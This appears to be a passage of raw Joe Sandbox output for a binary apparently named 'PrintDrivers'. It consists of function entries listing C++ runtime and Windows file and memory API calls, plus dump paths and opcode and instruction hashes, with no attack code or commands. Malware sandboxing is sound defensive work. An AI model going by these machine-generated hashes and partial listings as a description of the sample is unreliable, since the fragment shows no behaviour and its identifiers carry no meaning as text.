                                                                    • Instruction ID: 95844ede2b381c7b6a22852395b0c2c61527e012a58460c19be45579350c3023
                                                                    • Opcode Fuzzy Hash: 2b874b6b5261be6d3464600377e40dc45651aedcd7204d4edb25ec9091ccce50
                                                                    • Instruction Fuzzy Hash: C8416B3590021ADFCF05DFD4C988AEEBFB5FF55314F100169E801AB252DB349A56CBA1
                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 0059F4F7
                                                                      • Part of subcall function 00587BD0: std::_Lockit::_Lockit.LIBCPMT ref: 00587C17
                                                                      • Part of subcall function 00587BD0: std::_Lockit::_Lockit.LIBCPMT ref: 00587C39
                                                                      • Part of subcall function 00587BD0: std::_Lockit::~_Lockit.LIBCPMT ref: 00587C61
                                                                      • Part of subcall function 00587BD0: std::_Lockit::~_Lockit.LIBCPMT ref: 00587DCE
                                                                    • _Find_elem.LIBCPMT ref: 0059F593
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                     • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
                                                                    • String ID: 0123456789-$0123456789-
                                                                    • API String ID: 3042121994-2494171821
                                                                    • Opcode ID: 0abb2c91cbf953228391877ece15bdbe3ff2e5d2ec6f3459aaeedd11d3866312
                                                                    • Instruction ID: ad5de15abb0a6a7d04f58d7b5426e5adf659d4088c621e1d79df5f7bd2865e1c
                                                                    • Opcode Fuzzy Hash: 0abb2c91cbf953228391877ece15bdbe3ff2e5d2ec6f3459aaeedd11d3866312
                                                                    • Instruction Fuzzy Hash: 7C416831900219DFCF05EFA4C888AEEBFB5FF48314F110169E811AB256DB34DA56CBA5
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0059ABA5
                                                                      • Part of subcall function 00595607: _Maklocstr.LIBCPMT ref: 00595627
                                                                      • Part of subcall function 00595607: _Maklocstr.LIBCPMT ref: 00595644
                                                                      • Part of subcall function 00595607: _Maklocstr.LIBCPMT ref: 00595661
                                                                      • Part of subcall function 00595607: _Maklocchr.LIBCPMT ref: 00595673
                                                                      • Part of subcall function 00595607: _Maklocchr.LIBCPMT ref: 00595686
                                                                    • _Mpunct.LIBCPMT ref: 0059AC32
                                                                    • _Mpunct.LIBCPMT ref: 0059AC4C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                     • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: Maklocstr$MaklocchrMpunct$H_prolog3
                                                                    • String ID: $+xv
                                                                    • API String ID: 2939335142-1686923651
                                                                    • Opcode ID: eb2341a041620b5f241bf67ea5e633427366f754ffb0234a652ebdf6700dbbb1
                                                                    • Instruction ID: 0947d851743e0815039d62ef405ba00c26cd697415626275ec2e56a8889e1e6d
                                                                    • Opcode Fuzzy Hash: eb2341a041620b5f241bf67ea5e633427366f754ffb0234a652ebdf6700dbbb1
                                                                    • Instruction Fuzzy Hash: F5217FB1904A526FDB25DF74C894B7BBEE8BB49300F04095AF499C7A41E730EA05CBE1
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                     • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: Mpunct$H_prolog3
                                                                    • String ID: $+xv
                                                                    • API String ID: 4281374311-1686923651
                                                                    • Opcode ID: ce4ef8569a516010f0b6692daafbd9602208eb3d476e393a9062302c82523c30
                                                                    • Instruction ID: 81a07ed31611f13be05101fecf8242988a5666c1b0a1eb24488d6e0845f30261
                                                                    • Opcode Fuzzy Hash: ce4ef8569a516010f0b6692daafbd9602208eb3d476e393a9062302c82523c30
                                                                    • Instruction Fuzzy Hash: 3D2183B1904A526ED721DF748884B7FBFF8BB4D300F04091AE499C7A41E730EA05CBA0
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                     • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog3_
                                                                    • String ID: false$iw]$true
                                                                    • API String ID: 2427045233-1778967338
                                                                    • Opcode ID: 09d6cde5d6d944515bf2603fb844ce07949410fd960dc612fc057280c711ea8b
                                                                    • Instruction ID: 9301395ea74c9f419c994834e3545cf74c95aa49ee76f306267f97be9253414b
                                                                    • Opcode Fuzzy Hash: 09d6cde5d6d944515bf2603fb844ce07949410fd960dc612fc057280c711ea8b
                                                                    • Instruction Fuzzy Hash: 6C118E75944746AECB20EFB4D405A9ABFF4BF19700F04891AF5959B741EB30A504CB60
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                     • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: _strrchr
                                                                    • String ID:
                                                                    • API String ID: 3213747228-0
                                                                    • Opcode ID: 9ce9449626763898fba8829ac99a917786efb0f9d0c04e5bf98ad664dd137c8c
                                                                    • Instruction ID: 42bc9d2fbfa4ee588d014964cbb7585a982c64680eb187c00eb38febd1330af4
                                                                    • Opcode Fuzzy Hash: 9ce9449626763898fba8829ac99a917786efb0f9d0c04e5bf98ad664dd137c8c
                                                                    • Instruction Fuzzy Hash: 27B1167290428A9FDB118F64C885BFEBFF5FF99340F24406AE4459B241D639ED01CB60
                                                                    APIs
                                                                    • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,00000000), ref: 0058921F
                                                                    • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,00000000), ref: 0058923F
                                                                      • Part of subcall function 00581AD0: LocalAlloc.KERNEL32(00000040,80000022,?,?), ref: 00581B57
                                                                      • Part of subcall function 00581AD0: LocalFree.KERNEL32(?,?), ref: 00581BFD
                                                                    • LocalFree.KERNEL32(00000008,?,?,?,?,?,00000000), ref: 005892A4
                                                                    • __cftoe.LIBCMT ref: 005893D0
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                     • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: Local$Alloc$Free$__cftoe
                                                                    • String ID:
                                                                    • API String ID: 49843589-0
                                                                    • Opcode ID: bba57d724eb5f18ea2f785c243925165819606304b55ed180215ce5ed1ec0c50
                                                                    • Instruction ID: 44c87f162d73ff2845a307b5b5b014524a8c0b829dc61d7066c20771aa183e99
                                                                    • Opcode Fuzzy Hash: bba57d724eb5f18ea2f785c243925165819606304b55ed180215ce5ed1ec0c50
                                                                    • Instruction Fuzzy Hash: DDA1A275A01249DFDB14EFA8C894AADBBF5FF88310F28462DE816E7390E7319905CB50
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 005A1F8F
                                                                    • collate.LIBCPMT ref: 005A1F98
                                                                      • Part of subcall function 005A0CC4: __EH_prolog3_GS.LIBCMT ref: 005A0CCB
                                                                      • Part of subcall function 005A0CC4: __Getcoll.LIBCPMT ref: 005A0D2F
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • __Getcoll.LIBCPMT ref: 005A1FDE
                                                                    • numpunct.LIBCPMT ref: 005A2236
                                                                      • Part of subcall function 00586010: LocalAlloc.KERNEL32(00000040,?,005943F0,00000020,?,?,005890A2,00000000,F3F544E4,?,?,?,?,005C6D1D,000000FF), ref: 00586016
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                     • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: GetcollLockitstd::_$AllocH_prolog3H_prolog3_LocalLockit::_Lockit::~_collatenumpunct
                                                                    • String ID:
                                                                    • API String ID: 259100098-0
                                                                    • Opcode ID: 0060fd8b92d9b5eb16950f1eff392cbd22a762f849016e7c8ed47f504782b324
                                                                    • Instruction ID: 763ced653801617a5b06e3adf1669ce4288cce2cb6f21c9007ef3f24cc334f85
                                                                    • Opcode Fuzzy Hash: 0060fd8b92d9b5eb16950f1eff392cbd22a762f849016e7c8ed47f504782b324
                                                                    • Instruction Fuzzy Hash: 359193B1904216AAD7247BB54C4EB7F7EE8FF82760F104518F849A7282EEB54D0097E2
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                     • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: AdjustPointer
                                                                    • String ID:
                                                                    • API String ID: 1740715915-0
                                                                    • Opcode ID: 4c4b8c1588820e882a2abdf46f1c95cbfb8934ac3d921302c485e2fe692526cb
                                                                    • Instruction ID: 071d3865bc65afff1aeb0f419b07f2ba0f410c2c92276f53453c333e86c35a16
                                                                    • Opcode Fuzzy Hash: 4c4b8c1588820e882a2abdf46f1c95cbfb8934ac3d921302c485e2fe692526cb
                                                                    • Instruction Fuzzy Hash: 6751E87260820AAFDB258F20CC45BBE7FA4FF5A310F24456DE80597291E731EE80D790
                                                                    APIs
                                                                    • LocalAlloc.KERNEL32(00000040,00000018,F3F544E4,?,00000000), ref: 0058B0E3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: AllocLocal
                                                                    • String ID: false$iw]$true
                                                                    • API String ID: 3494564517-1778967338
                                                                    • Opcode ID: 5c01ab794ba2f60a1df90dbc5bf386c470f733e5cb3da05351655678ef9852f6
                                                                    • Instruction ID: 54af88da64caa70438d21007fbd6563db91925496bcb195f6c31cc2ef7c38a0f
                                                                    • Opcode Fuzzy Hash: 5c01ab794ba2f60a1df90dbc5bf386c470f733e5cb3da05351655678ef9852f6
                                                                    • Instruction Fuzzy Hash: 1F6181B1D00709DBDB20DFA4C845B9EBBB8FF18704F10426EE855A7281E771AA44CF91
                                                                    APIs
                                                                    • LocalAlloc.KERNEL32(00000040,80000022,?,?,?,?,?,F3F544E4,?,?,?,?,005C6160,000000FF,?,0058745D), ref: 00587671
                                                                    • LocalAlloc.KERNEL32(00000040,7FFFFFFF,?,?,?,?,?,F3F544E4,?,?,?,?,005C6160,000000FF,?,0058745D), ref: 00587691
                                                                      • Part of subcall function 00582B10: LocalAlloc.KERNEL32(00000040,005DD827,005DD804,005DD804), ref: 00582B49
                                                                    • LocalFree.KERNEL32(]tX,000000FF,?,0058745D,?,?,00000000,00000000,?,F3F544E4,F3F544E4,?), ref: 0058770C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: Local$Alloc$Free
                                                                    • String ID: ]tX
                                                                    • API String ID: 209276640-3049652677
                                                                    • Opcode ID: ba8eabf1a33607b39bfa4a4f669de3e91ccd8b9140a5bf1443737b4963217545
                                                                    • Instruction ID: 201b24f01dad9153a9ef62678d2a4bf6ad5b466b2ce4d751fd150fd2ad83d165
                                                                    • Opcode Fuzzy Hash: ba8eabf1a33607b39bfa4a4f669de3e91ccd8b9140a5bf1443737b4963217545
                                                                    • Instruction Fuzzy Hash: A341E63250821A8FD714AF29DC8596E7BD9FB89350F240A7AF926E7261EB70DC04C791
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e95341a83b4e53407d8d0665afd96cece6fbfb3644e041f024d83766ea567d29
                                                                    • Instruction ID: 9dcfc48d81f070701f6ad672886800c7415318bbed8925b56a52bd9e1c415f51
                                                                    • Opcode Fuzzy Hash: e95341a83b4e53407d8d0665afd96cece6fbfb3644e041f024d83766ea567d29
                                                                    • Instruction Fuzzy Hash: FA21D471604616AFDF22AF658C89DAB7FACFF413647108A65F929E7251DB30FE008760
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,00000008,005BB99E,00594425,0059446B), ref: 005B6651
                                                                    • _free.LIBCMT ref: 005B66AE
                                                                    • _free.LIBCMT ref: 005B66E4
                                                                    • SetLastError.KERNEL32(00000000,00000006,000000FF), ref: 005B66EF
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast_free
                                                                    • String ID:
                                                                    • API String ID: 2283115069-0
                                                                    • Opcode ID: 8bc7ab04e283765d20ad660f629d18e6155e918914e1e06eccdf1346348f91e4
                                                                    • Instruction ID: 2329d7f51f095ecd5c0d3b0a9f36af12fa3239cc0de9afb9637daa8ea2cfe4f1
                                                                    • Opcode Fuzzy Hash: 8bc7ab04e283765d20ad660f629d18e6155e918914e1e06eccdf1346348f91e4
                                                                    • Instruction Fuzzy Hash: B2110A362005037ED6212AB45C8EEFA2F5DBFE1775B380636F526821D2EE69AC049351
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00592AFE
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00592B08
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00592BAC
                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00592BB7
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: Lockitstd::_$Concurrency::cancel_current_taskH_prolog3Lockit::_Lockit::~_
                                                                    • String ID:
                                                                    • API String ID: 4244582100-0
                                                                    • Opcode ID: cd180f0c0f185516a953f402f9cf1823a3ea9704ad17ca55085a19f9a222b5c3
                                                                    • Instruction ID: ee3b9010c462134ab9ce91c8e66f8ebcfa02e1f551e2351a7c3b3559882d1c75
                                                                    • Opcode Fuzzy Hash: cd180f0c0f185516a953f402f9cf1823a3ea9704ad17ca55085a19f9a222b5c3
                                                                    • Instruction Fuzzy Hash: D4211935A0061AAFCB04EF14C895EADBBA1FF49310F018959E9669B7A1CF70ED50CF80
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,00000000,?,005A93A9,00000000,?,005A9421,00000000,00000000,00000000,00000000,00000000,?,00582DBF,F3F544E4), ref: 005B67A8
                                                                    • _free.LIBCMT ref: 005B6805
                                                                    • _free.LIBCMT ref: 005B683B
                                                                    • SetLastError.KERNEL32(00000000,00000006,000000FF,?,00000000,?,005A93A9,00000000,?,005A9421,00000000,00000000,00000000,00000000,00000000), ref: 005B6846
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast_free
                                                                    • String ID:
                                                                    • API String ID: 2283115069-0
                                                                    • Opcode ID: 3ad52ed7755d382160a2f3ae86066cb206c60392ecf3ce6770f25ffaed45fb1e
                                                                    • Instruction ID: 7983dd6d35ab4b0742aafc5d60a0240e859608a8dc9bb6a153423f6bdbd0aad0
                                                                    • Opcode Fuzzy Hash: 3ad52ed7755d382160a2f3ae86066cb206c60392ecf3ce6770f25ffaed45fb1e
                                                                    • Instruction Fuzzy Hash: 04110C71201503BAD6202A745CCEEFA2E9DFFD1B757380636F116931D2EE29AC08A350
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000,F3F544E4), ref: 005903AC
                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 005903CC
                                                                    • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 005903FD
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00590416
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandlePointerWrite
                                                                    • String ID:
                                                                    • API String ID: 3604237281-0
                                                                    • Opcode ID: b4bc57873f4cb38c35865a96d01f33460ff1e4fdcd04ba925378b7e3eac904e8
                                                                    • Instruction ID: 4be2e867c4eb4dcf156c5a66bd287437624fff64a6b28475a169d5690fa28784
                                                                    • Opcode Fuzzy Hash: b4bc57873f4cb38c35865a96d01f33460ff1e4fdcd04ba925378b7e3eac904e8
                                                                    • Instruction Fuzzy Hash: 20218171941619EFDB20CF54DC4AF9EBBB8FB05B24F10425AF511B72C0D7B46A058BA4
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 005960DB
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 005960E5
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • std::_Facet_Register.LIBCPMT ref: 00596136
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00596156
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID:
                                                                    • API String ID: 2854358121-0
                                                                    • Opcode ID: 96218065a6891051ea417ec0f1fa0946514f7104f49721d7ce41ad9b44641041
                                                                    • Instruction ID: 1dca0ee78f8c13b78abbef9c53b78ade505e907ab4f23b01562af69317e65213
                                                                    • Opcode Fuzzy Hash: 96218065a6891051ea417ec0f1fa0946514f7104f49721d7ce41ad9b44641041
                                                                    • Instruction Fuzzy Hash: 0C01613590421A9BCF05FBA4C849ABE7FA1FF84710F254509E4156B391DF709E4ADB81
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00596170
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0059617A
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • std::_Facet_Register.LIBCPMT ref: 005961CB
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 005961EB
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID:
                                                                    • API String ID: 2854358121-0
                                                                    • Opcode ID: 7f21f9823649a015580ad8835f083a93e67c3988974dd794533733ae570adc34
                                                                    • Instruction ID: dd8e222986d37b140c379b3b6c3a1d3066c6339acf38d37e8620230416357542
                                                                    • Opcode Fuzzy Hash: 7f21f9823649a015580ad8835f083a93e67c3988974dd794533733ae570adc34
                                                                    • Instruction Fuzzy Hash: 9D01A1359002168BCF05EBA48849ABE7FB1FFC4320F650549F8106B292DF70DE49DB90
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00596205
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0059620F
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • std::_Facet_Register.LIBCPMT ref: 00596260
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00596280
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
